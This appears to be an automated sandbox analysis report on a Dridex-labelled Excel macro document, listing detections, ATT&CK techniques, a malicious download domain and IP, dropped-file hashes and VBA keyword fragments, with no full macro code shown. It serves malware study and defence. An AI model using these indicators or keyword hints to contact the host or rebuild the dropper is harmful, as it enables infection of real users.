Analysis Report Dridex-06-bc1b.xlsm
Overview
General Information
Detection
Score: | 92 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
System Summary: |
---|
Sigma detected: Microsoft Office Product Spawning Windows Shell |
Source: | Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team |
Signature Overview |
---|
AV Detection: |
---|
Antivirus / Scanner detection for submitted sample |
Source: | Avira: |
Multi AV Scanner detection for domain / URL |
Source: | Virustotal: |
Multi AV Scanner detection for submitted file |
Source: | Virustotal: |
Source: | ReversingLabs: |
Compliance: |
---|
Uses new MSVCR Dlls |
Source: | File opened: |
Uses secure TLS version for HTTPS connections |
Source: | HTTPS traffic detected: |
Software Vulnerabilities: |
---|
Document exploit detected (UrlDownloadToFile) |
Source: | Section loaded: |
Document exploit detected (process start blacklist hit) |
Source: | Process created: |
Source: | DNS query: |
Source: | TCP traffic: |
Source: | TCP traffic: |
Source: | IP Address: |
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | File created: |
Source: | DNS traffic detected: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: |
Source: | String found in binary or memory: |
Source: | Network traffic detected: |
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: |
System Summary: |
---|
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) |
Source: | Screenshot OCR: |
Document contains an embedded VBA macro which may execute processes |
Source: | OLE, VBA macro: | Name: PagamentoDocumento |
Source: | OLE, VBA macro: | Name: PagamentoDocumento |
Found Excel 4.0 Macro with suspicious formulas |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | OLE, VBA macro line: |
Source: | OLE, VBA macro: | Name: pagoUno_Layout |
Source: | OLE indicator, VBA macros: |
Source: | Classification label: |
Source: | File created: |
Source: | File created: |
Source: | File read: |
Source: | Key opened: |
Source: | Virustotal: |
Source: | ReversingLabs: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Process created: |
Source: | Automated click: |
Source: | Automated click: |
Source: | Window detected: |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Initial sample: |
Source: | Key opened: |
Source: | File opened: |
Source: | Initial sample: |
Source: | Process information set: | (21 entries; details not shown) |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting22 | Path Interception | Process Injection1 | Masquerading1 | OS Credential Dumping | File and Directory Discovery1 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Exploitation for Client Execution23 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | System Information Discovery2 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Non-Application Layer Protocol1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting22 | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Ingress Tool Transfer1 | SIM Card Swap | Carrier Billing Fraud | |
Behavior Graph |
---|
Screenshots |
---|
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| | 51% | Virustotal | | |
| | 5% | Metadefender | | |
| | 59% | ReversingLabs | Document-Word.Trojan.Ursnif | |
| | 100% | Avira | W2000M/Agent.1970033 | |
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| | 13% | Virustotal | | |
URLs |
---|
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
| | 0% | Avira URL Cloud | safe | |
| | 0% | Avira URL Cloud | safe | |
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
compagniamaestro.com | 199.192.21.36 | true | true | | unknown |
URLs from Memory and Binaries |
---|
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | | false | | unknown |
| | | false | | high |
| | | false | | low |
Contacted IPs |
---|
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
199.192.21.36 | unknown | United States | | 22612 | NAMECHEAP-NETUS | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 344478 |
Start date: | 26.01.2021 |
Start time: | 16:15:51 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 5m 19s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | Dridex-06-bc1b.xlsm |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of new started processes analysed: | 6 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal92.expl.evad.winXLSM@7/16@1/1 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
Warnings: | |
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
199.192.21.36 | (8 associated samples; names and hashes not shown) | | malicious | | |
Domains |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
compagniamaestro.com | (8 associated samples; names and hashes not shown) | | malicious | | |
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
NAMECHEAP-NETUS | (20 associated samples; names and hashes not shown) | | malicious | | |
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
7dcce5b76c8b17472d024758970a406b | (20 associated samples; names and hashes not shown) | | malicious | | |
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 45017 |
Entropy (8bit): | 5.1653486867978575 |
Encrypted: | false |
SSDEEP: | 768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG |
MD5: | 4B04126D788D6958C2C62DCE6FE37988 |
SHA1: | 1705C60E4BD29956E80BD34267F16F800037ED35 |
SHA-256: | 00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0 |
SHA-512: | 57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359 |
Malicious: | true |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 45017 |
Entropy (8bit): | 5.1653486867978575 |
Encrypted: | false |
SSDEEP: | 768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG |
MD5: | 4B04126D788D6958C2C62DCE6FE37988 |
SHA1: | 1705C60E4BD29956E80BD34267F16F800037ED35 |
SHA-256: | 00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0 |
SHA-512: | 57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 45017 |
Entropy (8bit): | 5.1653486867978575 |
Encrypted: | false |
SSDEEP: | 768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG |
MD5: | 4B04126D788D6958C2C62DCE6FE37988 |
SHA1: | 1705C60E4BD29956E80BD34267F16F800037ED35 |
SHA-256: | 00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0 |
SHA-512: | 57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Reputation: | high, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 893 |
Entropy (8bit): | 7.366016576663508 |
Encrypted: | false |
SSDEEP: | 24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x |
MD5: | D4AE187B4574036C2D76B6DF8A8C1A30 |
SHA1: | B06F409FA14BAB33CBAF4A37811B8740B624D9E5 |
SHA-256: | A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7 |
SHA-512: | 1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C |
Malicious: | false |
Reputation: | high, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 326 |
Entropy (8bit): | 3.123186963792904 |
Encrypted: | false |
SSDEEP: | 6:kKrZwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:SkPlE99SNxAhUegeT2 |
MD5: | 7E0054FA6C074543BC9B37D934E8D2DF |
SHA1: | BF35F8FEE206925C323B66BCE8E35582F97AA141 |
SHA-256: | DBE4735D4110A227E4A873ADC52C6A58A80929FF1B260ED44E300AF874586F2C |
SHA-512: | 844BCD48869A7590E9D4B914F1654551A10B87E314C06633C48A484501E17B7DA8F80269AFA18539F7BE5DF19ACFF13BDF1D9A0414A14BD6088C043940AAE1F6 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 252 |
Entropy (8bit): | 3.0294634724686764 |
Encrypted: | false |
SSDEEP: | 3:kkFklJxkSfllXlE/QhzllPlzRkwWBARLNDU+ZMlKlBkvclcMlVHblB1UAYpFit:kK4kIliBAIdQZV7eAYLit |
MD5: | 515ABC50F072563813F74B645FAA09D5 |
SHA1: | 5140FDCA9F17840721C22BEA2AF5B78EBA18C08E |
SHA-256: | BC1FB59C03A1BC54D0EF895C91E04B0BFD80CA55D3CA39BC311B3899EA94087B |
SHA-512: | 8CEB5158E12F4D9B05EFC5C80F73F20E9CA189C02CACB2EF111414B724AB25C42C4B751956BB60C7B49DCBBA7ADB6E3C8052574AF6E57D0303B294B41DFCAA81 |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 45017 |
Entropy (8bit): | 5.1653486867978575 |
Encrypted: | false |
SSDEEP: | 768:tqnkaQ3w/C5kmWGHbqgPiZZz/aZSO7b62pQTVPQudQQ0mpVcQrvJoOk:AnkaQ3w/C5kmWsbqgPiHz/ar7NeBPQuG |
MD5: | 4B04126D788D6958C2C62DCE6FE37988 |
SHA1: | 1705C60E4BD29956E80BD34267F16F800037ED35 |
SHA-256: | 00D2F1928F6FD6B0B85CC91EB6B4EDB7A9A3A9E532C09B908E3A5ECFF2845FC0 |
SHA-512: | 57A0B3892F3754C57A318BEC9E789D7B6DCA4C8AECDCD66BDA864487254AB2A993F5A56495D3F3C9F4FBFD7BD75CD01FB2FE33D26A55092DED4A6E30B5996359 |
Malicious: | false |
Reputation: | low |
IE Cache URL: | https://compagniamaestro.com/ |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1976 |
Entropy (8bit): | 1.9759705070369498 |
Encrypted: | false |
SSDEEP: | 12:Yn9e/kaHslqLYp0FIQ4+P/k1EijBdShS8u1NnNlou1NRztDAcqdckgDWojkMXNVf:YniVH9a0x4I8BAKNHoKNfDn9tUs0zCp |
MD5: | 1C7221B8A7104792FDEEA41E5D7BA0D0 |
SHA1: | D49122E2BF94D92ED067570D638B672855C05893 |
SHA-256: | 76F287B1E3251B7E0E5BA27BFB05B35831150CC665DE00F9FD2D807E2D2A028D |
SHA-512: | 928EF6FCCDB96A4AADD35D36171F3D09DE5605A70FE505862A294F089FEF53E697426017D3973B9BCAFF8D579A8A85C38943DCF47C5C5DD1187AB1A20D50E473 |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1005 |
Entropy (8bit): | 7.551834228633037 |
Encrypted: | false |
SSDEEP: | 24:aB2uoC0w2bONUV99upE4ZXn8bf4F0T+xAlO6y:BuoBwawUV99/4ZXn8bT6AOf |
MD5: | DA5C67B7042BB04E6BFB9F60D9470287 |
SHA1: | BFBDC4596111EF5D95183DB0526353CBCA84C43F |
SHA-256: | 0522D7C7600F1DD56346450DFE1466BA51CFEBCD095CD3154FB30DC563F96763 |
SHA-512: | D16BCF49A56F0FB926DB7C8DA413A976E1D0F53DA5EA73B729A5D11FFCF42FA149D17D3587A3DF56665C6CAAC44F903CA5D0278DCFDA8FE3C43318724C3507EE |
Malicious: | false |
Reputation: | low |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 5305 |
Entropy (8bit): | 7.83628317482236 |
Encrypted: | false |
SSDEEP: | 96:ndsgj5y6EGgWKW/WkPsLhsKto+bDOukamzejtjcF+6QTzys5kcWCgupHLib:ndsgjI6RdKcXOn9b9vmUgs6QXys+NYW |
MD5: | 31F86AA3BD1ADA53D99B7BBEF6A1DEFC |
SHA1: | 148331C2D5EB437437D48ABE51866384D7154044 |
SHA-256: | E0EC55345EDC7EF4BBE4F20ABD6F8FE965475C632766FAE6CA1853674F2DC34C |
SHA-512: | 96D1DC354DCB3A262B997A98E83A0162F0F9E93050C7BC952B46FB886336C1C6370B3D5A9316039FD84211161F34BA3A866B8DFD385323551743674A24FF7B39 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 43608 |
Entropy (8bit): | 7.775661687189793 |
Encrypted: | false |
SSDEEP: | 768:w0PwCVsTx8txX/vR1IUfSQVg4MMOo0JzAcTlrz5RzXO+iFoWZxeh9E9S:w0PHsdgFXffDOo0JzAC1t++UoWZxeh9D |
MD5: | 4729F4D4D3E6A40897714474BD193698 |
SHA1: | 1732E41AD6A7A026F51541AF370BBEDDC3C29192 |
SHA-256: | BBC203190FCC1C1C9B14E09A5A17DB8C20DFF8792DFA2F75387C66C93D36AADB |
SHA-512: | 0CCFECDADDBA30755CF5BE0F4AD460E0DB09EB9F52EADBFF8D519F4D8962322B0CB520E75CAE03569389AF3903B9C1C0579F9EC4B785B1B2BBF1E6ED60743632 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 58936 |
Entropy (8bit): | 7.994797855729196 |
Encrypted: | true |
SSDEEP: | 768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj |
MD5: | E4F1E21910443409E81E5B55DC8DE774 |
SHA1: | EC0885660BD216D0CDD5E6762B2F595376995BD0 |
SHA-256: | CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5 |
SHA-512: | 2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 241332 |
Entropy (8bit): | 4.206817415570808 |
Encrypted: | false |
SSDEEP: | 1536:cG2LEQNSk8SCtKBX0Gpb2vxKHnVMOkOX0mRO/NIAIQK7viKAJYsA0ppDCLTfMRsi:cTNNSk8DtKBrpb2vxrOpprf/nVq |
MD5: | FDC005848930295BD2BEDC28CDDF4E57 |
SHA1: | 425ACD9C11F3ADD39533B5859DA2D4FBFC3C66EE |
SHA-256: | 14D206152AB901B785CA013A80585FBA93F329324E1304DB04AA380A3C76F1A9 |
SHA-512: | C70BA3D8F0643DFC3D514D573A7DA52E96BB3AB1DE4223E3CD51B34DD1B20D0E5CD493EA7710183CED563F821EF92C1CC6C63EF3BD81705D4471E71F62B593E8 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 152533 |
Entropy (8bit): | 6.31602258454967 |
Encrypted: | false |
SSDEEP: | 1536:SIPLlYy2pRSjgCyrYBb5HQop4Ydm6CWku2PtIz0jD1rfJs42t6WP:S4LIpRScCy+fdmcku2PagwQA |
MD5: | D0682A3C344DFC62FB18D5A539F81F61 |
SHA1: | 09D3E9B899785DA377DF2518C6175D70CCF9DA33 |
SHA-256: | 4788F7F15DE8063BB3B2547AF1BD9CDBD0596359550E53EC98E532B2ADB5EC5A |
SHA-512: | 0E884D65C738879C7038C8FB592F53DD515E630AEACC9D9E5F9013606364F092ACF7D832E1A8DAC86A1F0B0E906B2302EE3A840A503654F2B39A65B2FEA04EC3 |
Malicious: | false |
Process: | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 165 |
Entropy (8bit): | 1.4377382811115937 |
Encrypted: | false |
SSDEEP: | 3:vZ/FFDJw2fV:vBFFGS |
MD5: | 797869BB881CFBCDAC2064F92B26E46F |
SHA1: | 61C1B8FBF505956A77E9A79CE74EF5E281B01F4B |
SHA-256: | D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185 |
SHA-512: | 1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D |
Malicious: | true |
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.6136938439046835 |
TrID: | |
File name: | Dridex-06-bc1b.xlsm |
File size: | 29655 |
MD5: | f72f88ebdf048fdfedf0aa3e298d9e71 |
SHA1: | b8ea58415338bed65d4cd194ead6ac663ad71a6c |
SHA256: | 78ccf25ecee02f759cefa6b1c29a00fb4ce64c000f7b9c04c1fc08e04d04bc1b |
SHA512: | 0c6d96fcda11df417cfd48d51753d5a6334d80df04b3709ccbfc8a2d5d073822ad606da49e99c724a9d5bd16a98a623f2f9f3a2cbfe2b01bc668f44991db2903 |
SSDEEP: | 384:flRwzF2FBLDDBf2kbi+lj4YhX8rRI6vXO9BvGiSmDU+P4QRdUgE5cF9Y3XF:fDAFqP1u6NsrRzXO+iSkU+waSxcF9YnF |
File Content Preview: | PK..........!.c...............[Content_Types].xml ...(......................................................................................................................................................................................................... |
File Icon |
---|
Icon Hash: | e4e2aa8aa4bcbcac |
Static OLE Info |
---|
General | |
---|---|
Document Type: | OpenXML |
Number of OLE Files: | 2 |
OLE File "/opt/package/joesandbox/database/analysis/344478/sample/Dridex-06-bc1b.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | False |
Application Name: | unknown |
Encrypted Document: | False |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: | True |
Summary | |
---|---|
Author: | |
Last Saved By: | |
Create Time: | 2020-11-24T09:53:01Z |
Last Saved Time: | 2020-11-24T11:16:24Z |
Creating Application: | |
Security: | 0 |
Document Summary | |
---|---|
Thumbnail Scaling Desired: | false |
Company: | |
Contains Dirty Links: | false |
Shared Document: | false |
Changed Hyperlinks: | false |
Application Version: | 16.0300 |
Streams with VBA |
---|
VBA File Name: Foglio1.cls, Stream Size: 2640 |
---|
General | |
---|---|
Stream Path: | VBA/Foglio1 |
VBA File Name: | Foglio1.cls |
Stream Size: | 2640 |
Data ASCII: | . . . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . p . . N . . . . c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . p a g o U n o , 1 0 , 0 , M S F o r m s , F r a m e . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . |
Data Raw: | 01 16 03 00 00 12 01 00 00 fc 03 00 00 f6 00 00 00 22 02 00 00 ff ff ff ff 03 04 00 00 a7 07 00 00 00 00 00 00 01 00 00 00 70 fe ed 4e 00 00 ff ff 63 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
PagamentoDocumento |
VB_Name |
VB_Creatable |
Application.OnTime |
VB_Exposed |
Frame" |
Len(n) |
VB_Control |
"TURN()": |
VB_Customizable |
"Aut" |
ActiveSheet.UsedRange.SpecialCells(xlCellTypeConstants): |
"=RE" |
Replace(E, |
"pagoUno, |
"BarUno" |
Chr(Asc(Mid(n, |
Split(u, |
PagamentoDocumento() |
VB_TemplateDerived |
MSForms, |
False |
excell() |
excell |
Attribute |
Private |
VB_PredeclaredId |
VB_GlobalNameSpace |
pagoUno_Layout() |
VB_Base |
VBA Code |
---|
VBA File Name: Modulo1.bas, Stream Size: 889 |
---|
General | |
---|---|
Stream Path: | VBA/Modulo1 |
VBA File Name: | Modulo1.bas |
Stream Size: | 889 |
Data ASCII: | . . . . . . . . . z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . k . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 19 03 00 00 00 00 00 00 01 00 00 00 70 fe a5 6b 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
Attribute |
VB_Name |
BarUno() |
ActiveWorkbook.Close |
VBA Code |
---|
VBA File Name: Questa_cartella_di_lavoro.cls, Stream Size: 1014 |
---|
General | |
---|---|
Stream Path: | VBA/Questa_cartella_di_lavoro |
VBA File Name: | Questa_cartella_di_lavoro.cls |
Stream Size: | 1014 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . p . . k . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . |
Data Raw: | 01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 70 fe 1e 6b 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |
VBA Code Keywords |
---|
Keyword |
---|
"Questa_cartella_di_lavoro" |
False |
VB_Exposed |
Attribute |
VB_Name |
VB_Creatable |
VB_PredeclaredId |
VB_GlobalNameSpace |
VB_Base |
VB_Customizable |
VB_TemplateDerived |
VBA Code |
---|
Streams |
---|
Stream Path: PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 564 |
---|
General | |
---|---|
Stream Path: | PROJECT |
File Type: | ASCII text, with CRLF line terminators |
Stream Size: | 564 |
Entropy: | 5.25985243733 |
Base64 Encoded: | True |
Data ASCII: | I D = " { 0 5 6 6 E 4 0 1 - 8 0 6 F - 4 7 1 6 - B 6 4 7 - E 0 B 8 5 9 A 4 D 5 7 D } " . . D o c u m e n t = Q u e s t a _ c a r t e l l a _ d i _ l a v o r o / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = F o g l i o 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l o 1 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " D 8 D A 6 F 9 5 7 3 9 5 7 3 9 5 7 3 9 5 7 3 " . . D P B = " B 0 B 2 0 7 6 8 0 8 6 8 0 |
Data Raw: | 49 44 3d 22 7b 30 35 36 36 45 34 30 31 2d 38 30 36 46 2d 34 37 31 36 2d 42 36 34 37 2d 45 30 42 38 35 39 41 34 44 35 37 44 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 51 75 65 73 74 61 5f 63 61 72 74 65 6c 6c 61 5f 64 69 5f 6c 61 76 6f 72 6f 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 46 6f 67 6c 69 6f 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d |
Stream Path: PROJECTwm, File Type: data, Stream Size: 128 |
---|
General | |
---|---|
Stream Path: | PROJECTwm |
File Type: | data |
Stream Size: | 128 |
Entropy: | 3.34420769179 |
Base64 Encoded: | False |
Data ASCII: | Q u e s t a _ c a r t e l l a _ d i _ l a v o r o . Q . u . e . s . t . a . _ . c . a . r . t . e . l . l . a . _ . d . i . _ . l . a . v . o . r . o . . . F o g l i o 1 . F . o . g . l . i . o . 1 . . . M o d u l o 1 . M . o . d . u . l . o . 1 . . . . . |
